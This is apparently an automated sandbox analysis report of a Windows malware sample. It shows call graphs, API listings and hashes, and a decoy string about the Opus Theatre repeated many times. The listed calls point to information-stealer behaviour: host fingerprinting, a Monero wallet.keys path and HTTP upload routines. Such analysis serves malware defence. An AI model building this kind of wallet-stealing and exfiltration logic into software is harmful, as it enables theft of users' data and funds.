                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D345F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D3471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D346CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00D34643
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 03a72b4b8aa36a53bf7982825bb1081b425f306335feee14b8a0574910eb13a5
                              • Instruction ID: 61e491bc5908dfca6b8bf58133ff12137fbcb9382818b11bef1582b84d9a9134
                              • Opcode Fuzzy Hash: 03a72b4b8aa36a53bf7982825bb1081b425f306335feee14b8a0574910eb13a5
                              • Instruction Fuzzy Hash: 4C4112607C27046EEE27BFA4A8D2EDD7766DF4770EF509840AE0052384CAB0756C8632

                              Control-flow Graph (basic blocks as node id, address range and calls; edges as source->target)
                              • 801 d34880-d34942: call d4a7a0 call d347b0 call d4a740 * 5 InternetOpenA StrCmpCA
                              • 816 d34944
                              • 817 d3494b-d3494f
                              • 818 d34955-d34acd: call d48b60 call d4a920 call d4a8a0 call d4a800 * 2 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a920 call d4a8a0 call d4a800 * 2 InternetConnectA
                              • 819 d34ecb-d34ef3: InternetCloseHandle call d4aad0 call d39ac0
                              • 829 d34f32-d34fa2: call d48990 * 2 call d4a7a0 call d4a800 * 8
                              • 830 d34ef5-d34f2d: call d4a820 call d4a9b0 call d4a8a0 call d4a800
                              • 905 d34ad3-d34ad7
                              • 906 d34ae5
                              • 907 d34ad9-d34ae3
                              • 908 d34aef-d34b22: HttpOpenRequestA
                              • 909 d34b28-d34e28: call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a9b0 call d4a8a0 call d4a800 call d4a920 call d4a8a0 call d4a800 call d4a740 call d4a920 * 2 call d4a8a0 call d4a800 * 2 call d4aad0 lstrlen call d4aad0 * 2 lstrlen call d4aad0 HttpSendRequestA
                              • 910 d34ebe-d34ec5: InternetCloseHandle
                              • 1021 d34e32-d34e5c: InternetReadFile
                              • 1022 d34e67-d34eb9: InternetCloseHandle call d4a800
                              • 1023 d34e5e-d34e65
                              • 1024 d34e69-d34ea7: call d4a9b0 call d4a8a0 call d4a800
                              Edges: 801->816, 801->817, 816->817, 817->818, 817->819, 818->819, 818->905, 819->829, 819->830, 830->829, 905->906, 905->907, 906->908, 907->908, 908->909, 908->910, 909->1021, 910->819, 1021->1022, 1021->1023, 1022->910, 1023->1022, 1023->1024, 1024->1021
                              APIs
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                                • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                                • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D34915
                              • StrCmpCA.SHLWAPI(?,008DE4E0), ref: 00D3493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D34ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00D50DDB,00000000,?,?,00000000,?,",00000000,?,008DE580), ref: 00D34DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D34E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D34E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D34E49
                              • InternetCloseHandle.WININET(00000000), ref: 00D34EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00D34EC5
                              • HttpOpenRequestA.WININET(00000000,008DE510,?,008DDA88,00000000,00000000,00400100,00000000), ref: 00D34B15
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • InternetCloseHandle.WININET(00000000), ref: 00D34ECF
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                              • Instruction ID: 015246e3a188a278cd97d149910b6f34e204f363d59906de15a625a0649368e7
                              • Opcode Fuzzy Hash: 871d6f240b32913cf761fc1762bb3f85703502892a9cbde9937e6fbb5b6a3dc1
                              • Instruction Fuzzy Hash: FA12B572950118ABEB15EBA4DC92FEEB378EF54304F514199B50662091EF702F89CF72
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00D4792F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                              • Instruction ID: d9be1405fe409dbb5c2c492f97846bd3080d95864ed19e184bc5d73c30bd4a67
                              • Opcode Fuzzy Hash: d84ec6d048155172c4035218bf227f27df0cf543a0a8beb7903d9e934abcad4c
                              • Instruction Fuzzy Hash: 4D01A4B1A04208EFCB04DF98DD45BAEBBB8FB44B21F10425AFA45E3380D37459448BB2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00D47887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D4789F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                              • Instruction ID: 158ed1e6cd03b51b977592e2d57af3cc983e5301bb3728a85a524026342f87b8
                              • Opcode Fuzzy Hash: 928b9db15edd1ff59b931d263b7a99eea234e1c3947676dcc66eb2d72549f929
                              • Instruction Fuzzy Hash: 01F04FB1944208AFC714DF98DD4ABAEBBB8EB44711F10025AFA05A2680C77455448BA2
                              APIs
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                              • Instruction ID: 75040abc17f4b85b396fec5a7907695b348c4a04d8747783bb06b48c9529ceab
                              • Opcode Fuzzy Hash: 4204713dcdecef06eb317b64f6078efefbae511ce6bf2490bfe6d744b91e6bc2
                              • Instruction Fuzzy Hash: EFD05E7490030CDBCB04DFE0D8496DDBBB8FB4C312F000554DD0962340EA3054C2CAA6

                              Control-flow Graph (basic blocks as node id, address range and calls; edges as source->target)
                              • 633 d49c10-d49c1a
                              • 634 d4a036-d4a0ca: LoadLibraryA * 8
                              • 635 d49c20-d4a031: GetProcAddress * 43
                              • 636 d4a146-d4a14d
                              • 637 d4a0cc-d4a141: GetProcAddress * 5
                              • 638 d4a216-d4a21d
                              • 639 d4a153-d4a211: GetProcAddress * 8
                              • 640 d4a21f-d4a293: GetProcAddress * 5
                              • 641 d4a298-d4a29f
                              • 642 d4a2a5-d4a332: GetProcAddress * 6
                              • 643 d4a337-d4a33e
                              • 644 d4a344-d4a41a: GetProcAddress * 9
                              • 645 d4a41f-d4a426
                              • 646 d4a4a2-d4a4a9
                              • 647 d4a428-d4a49d: GetProcAddress * 5
                              • 648 d4a4dc-d4a4e3
                              • 649 d4a4ab-d4a4d7: GetProcAddress * 2
                              • 650 d4a515-d4a51c
                              • 651 d4a4e5-d4a510: GetProcAddress * 2
                              • 652 d4a612-d4a619
                              • 653 d4a522-d4a60d: GetProcAddress * 10
                              • 654 d4a67d-d4a684
                              • 655 d4a61b-d4a678: GetProcAddress * 4
                              • 656 d4a686-d4a699: GetProcAddress
                              • 657 d4a69e-d4a6a5
                              • 658 d4a6a7-d4a703: GetProcAddress * 4
                              • 659 d4a708-d4a709
                              Edges: 633->634, 633->635, 634->636, 634->637, 635->634, 636->638, 636->639, 637->636, 638->640, 638->641, 639->638, 640->641, 641->642, 641->643, 642->643, 643->644, 643->645, 644->645, 645->646, 645->647, 646->648, 646->649, 647->646, 648->650, 648->651, 649->648, 650->652, 650->653, 651->650, 652->654, 652->655, 653->652, 654->656, 654->657, 655->654, 656->657, 657->658, 657->659, 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,008C6720), ref: 00D49C2D
                              • GetProcAddress.KERNEL32(75900000,008C67E0), ref: 00D49C45
                              • GetProcAddress.KERNEL32(75900000,008D8D60), ref: 00D49C5E
                              • GetProcAddress.KERNEL32(75900000,008D8C70), ref: 00D49C76
                              • GetProcAddress.KERNEL32(75900000,008DC8E0), ref: 00D49C8E
                              • GetProcAddress.KERNEL32(75900000,008DC8C8), ref: 00D49CA7
                              • GetProcAddress.KERNEL32(75900000,008CB450), ref: 00D49CBF
                              • GetProcAddress.KERNEL32(75900000,008DCA48), ref: 00D49CD7
                              • GetProcAddress.KERNEL32(75900000,008DC8F8), ref: 00D49CF0
                              • GetProcAddress.KERNEL32(75900000,008DCA78), ref: 00D49D08
                              • GetProcAddress.KERNEL32(75900000,008DC838), ref: 00D49D20
                              • GetProcAddress.KERNEL32(75900000,008C6780), ref: 00D49D39
                              • GetProcAddress.KERNEL32(75900000,008C6920), ref: 00D49D51
                              • GetProcAddress.KERNEL32(75900000,008C6940), ref: 00D49D69
                              • GetProcAddress.KERNEL32(75900000,008C6680), ref: 00D49D82
                              • GetProcAddress.KERNEL32(75900000,008DC910), ref: 00D49D9A
                              • GetProcAddress.KERNEL32(75900000,008DC880), ref: 00D49DB2
                              • GetProcAddress.KERNEL32(75900000,008CB3D8), ref: 00D49DCB
                              • GetProcAddress.KERNEL32(75900000,008C66A0), ref: 00D49DE3
                              • GetProcAddress.KERNEL32(75900000,008DC808), ref: 00D49DFB
                              • GetProcAddress.KERNEL32(75900000,008DC9B8), ref: 00D49E14
                              • GetProcAddress.KERNEL32(75900000,008DC868), ref: 00D49E2C
                              • GetProcAddress.KERNEL32(75900000,008DC988), ref: 00D49E44
                              • GetProcAddress.KERNEL32(75900000,008C6760), ref: 00D49E5D
                              • GetProcAddress.KERNEL32(75900000,008DC9D0), ref: 00D49E75
                              • GetProcAddress.KERNEL32(75900000,008DC850), ref: 00D49E8D
                              • GetProcAddress.KERNEL32(75900000,008DCAC0), ref: 00D49EA6
                              • GetProcAddress.KERNEL32(75900000,008DCA30), ref: 00D49EBE
                              • GetProcAddress.KERNEL32(75900000,008DC928), ref: 00D49ED6
                              • GetProcAddress.KERNEL32(75900000,008DC940), ref: 00D49EEF
                              • GetProcAddress.KERNEL32(75900000,008DCA00), ref: 00D49F07
                              • GetProcAddress.KERNEL32(75900000,008DCA90), ref: 00D49F1F
                              • GetProcAddress.KERNEL32(75900000,008DC958), ref: 00D49F38
                              • GetProcAddress.KERNEL32(75900000,008D9E88), ref: 00D49F50
                              • GetProcAddress.KERNEL32(75900000,008DCA60), ref: 00D49F68
                              • GetProcAddress.KERNEL32(75900000,008DC898), ref: 00D49F81
                              • GetProcAddress.KERNEL32(75900000,008C67A0), ref: 00D49F99
                              • GetProcAddress.KERNEL32(75900000,008DCAA8), ref: 00D49FB1
                              • GetProcAddress.KERNEL32(75900000,008C6800), ref: 00D49FCA
                              • GetProcAddress.KERNEL32(75900000,008DCAD8), ref: 00D49FE2
                              • GetProcAddress.KERNEL32(75900000,008DC970), ref: 00D49FFA
                              • GetProcAddress.KERNEL32(75900000,008C65A0), ref: 00D4A013
                              • GetProcAddress.KERNEL32(75900000,008C63E0), ref: 00D4A02B
                              • LoadLibraryA.KERNEL32(008DC820,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A03D
                              • LoadLibraryA.KERNEL32(008DC9A0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A04E
                              • LoadLibraryA.KERNEL32(008DC8B0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A060
                              • LoadLibraryA.KERNEL32(008DC7F0,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A072
                              • LoadLibraryA.KERNEL32(008DC9E8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A083
                              • LoadLibraryA.KERNEL32(008DCA18,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A095
                              • LoadLibraryA.KERNEL32(008DCBC8,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0A7
                              • LoadLibraryA.KERNEL32(008DCC40,?,00D45CA3,00D50AEB,?,?,?,?,?,?,?,?,?,?,00D50AEA,00D50AE3), ref: 00D4A0B8
                              • GetProcAddress.KERNEL32(75FD0000,008C6440), ref: 00D4A0DA
                              • GetProcAddress.KERNEL32(75FD0000,008DCCA0), ref: 00D4A0F2
                              • GetProcAddress.KERNEL32(75FD0000,008D89C0), ref: 00D4A10A
                              • GetProcAddress.KERNEL32(75FD0000,008DCB38), ref: 00D4A123
                              • GetProcAddress.KERNEL32(75FD0000,008C62A0), ref: 00D4A13B
                              • GetProcAddress.KERNEL32(6FD30000,008CB298), ref: 00D4A160
                              • GetProcAddress.KERNEL32(6FD30000,008C6660), ref: 00D4A179
                              • GetProcAddress.KERNEL32(6FD30000,008CB130), ref: 00D4A191
                              • GetProcAddress.KERNEL32(6FD30000,008DCB20), ref: 00D4A1A9
                              • GetProcAddress.KERNEL32(6FD30000,008DCD18), ref: 00D4A1C2
                              • GetProcAddress.KERNEL32(6FD30000,008C6460), ref: 00D4A1DA
                              • GetProcAddress.KERNEL32(6FD30000,008C6620), ref: 00D4A1F2
                              • GetProcAddress.KERNEL32(6FD30000,008DCBF8), ref: 00D4A20B
                              • GetProcAddress.KERNEL32(763B0000,008C6480), ref: 00D4A22C
                              • GetProcAddress.KERNEL32(763B0000,008C6520), ref: 00D4A244
                              • GetProcAddress.KERNEL32(763B0000,008DCD90), ref: 00D4A25D
                              • GetProcAddress.KERNEL32(763B0000,008DCB50), ref: 00D4A275
                              • GetProcAddress.KERNEL32(763B0000,008C6640), ref: 00D4A28D
                              • GetProcAddress.KERNEL32(750F0000,008CB180), ref: 00D4A2B3
                              • GetProcAddress.KERNEL32(750F0000,008CB158), ref: 00D4A2CB
                              • GetProcAddress.KERNEL32(750F0000,008DCD30), ref: 00D4A2E3
                              • GetProcAddress.KERNEL32(750F0000,008C6280), ref: 00D4A2FC
                              • GetProcAddress.KERNEL32(750F0000,008C65C0), ref: 00D4A314
                              • GetProcAddress.KERNEL32(750F0000,008CAEB0), ref: 00D4A32C
                              • GetProcAddress.KERNEL32(75A50000,008DCB98), ref: 00D4A352
                              • GetProcAddress.KERNEL32(75A50000,008C65E0), ref: 00D4A36A
                              • GetProcAddress.KERNEL32(75A50000,008D88C0), ref: 00D4A382
                              • GetProcAddress.KERNEL32(75A50000,008DCD00), ref: 00D4A39B
                              • GetProcAddress.KERNEL32(75A50000,008DCDA8), ref: 00D4A3B3
                              • GetProcAddress.KERNEL32(75A50000,008C63C0), ref: 00D4A3CB
                              • GetProcAddress.KERNEL32(75A50000,008C62C0), ref: 00D4A3E4
                              • GetProcAddress.KERNEL32(75A50000,008DCC10), ref: 00D4A3FC
                              • GetProcAddress.KERNEL32(75A50000,008DCD48), ref: 00D4A414
                              • GetProcAddress.KERNEL32(75070000,008C6300), ref: 00D4A436
                              • GetProcAddress.KERNEL32(75070000,008DCB68), ref: 00D4A44E
                              • GetProcAddress.KERNEL32(75070000,008DCDD8), ref: 00D4A466
                              • GetProcAddress.KERNEL32(75070000,008DCCD0), ref: 00D4A47F
                              • GetProcAddress.KERNEL32(75070000,008DCD60), ref: 00D4A497
                              • GetProcAddress.KERNEL32(74E50000,008C62E0), ref: 00D4A4B8
                              • GetProcAddress.KERNEL32(74E50000,008C64E0), ref: 00D4A4D1
                              • GetProcAddress.KERNEL32(75320000,008C6320), ref: 00D4A4F2
                              • GetProcAddress.KERNEL32(75320000,008DCCE8), ref: 00D4A50A
                              • GetProcAddress.KERNEL32(6F060000,008C6500), ref: 00D4A530
                              • GetProcAddress.KERNEL32(6F060000,008C6340), ref: 00D4A548
                              • GetProcAddress.KERNEL32(6F060000,008C6600), ref: 00D4A560
                              • GetProcAddress.KERNEL32(6F060000,008DCB08), ref: 00D4A579
                              • GetProcAddress.KERNEL32(6F060000,008C6360), ref: 00D4A591
                              • GetProcAddress.KERNEL32(6F060000,008C6560), ref: 00D4A5A9
                              • GetProcAddress.KERNEL32(6F060000,008C6580), ref: 00D4A5C2
                              • GetProcAddress.KERNEL32(6F060000,008C64A0), ref: 00D4A5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00D4A5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00D4A607
                              • GetProcAddress.KERNEL32(74E00000,008DCC28), ref: 00D4A629
                              • GetProcAddress.KERNEL32(74E00000,008D8910), ref: 00D4A641
                              • GetProcAddress.KERNEL32(74E00000,008DCC88), ref: 00D4A659
                              • GetProcAddress.KERNEL32(74E00000,008DCAF0), ref: 00D4A672
                              • GetProcAddress.KERNEL32(74DF0000,008C6380), ref: 00D4A693
                              • GetProcAddress.KERNEL32(6FA70000,008DCBB0), ref: 00D4A6B4
                              • GetProcAddress.KERNEL32(6FA70000,008C64C0), ref: 00D4A6CD
                              • GetProcAddress.KERNEL32(6FA70000,008DCB80), ref: 00D4A6E5
                              • GetProcAddress.KERNEL32(6FA70000,008DCD78), ref: 00D4A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
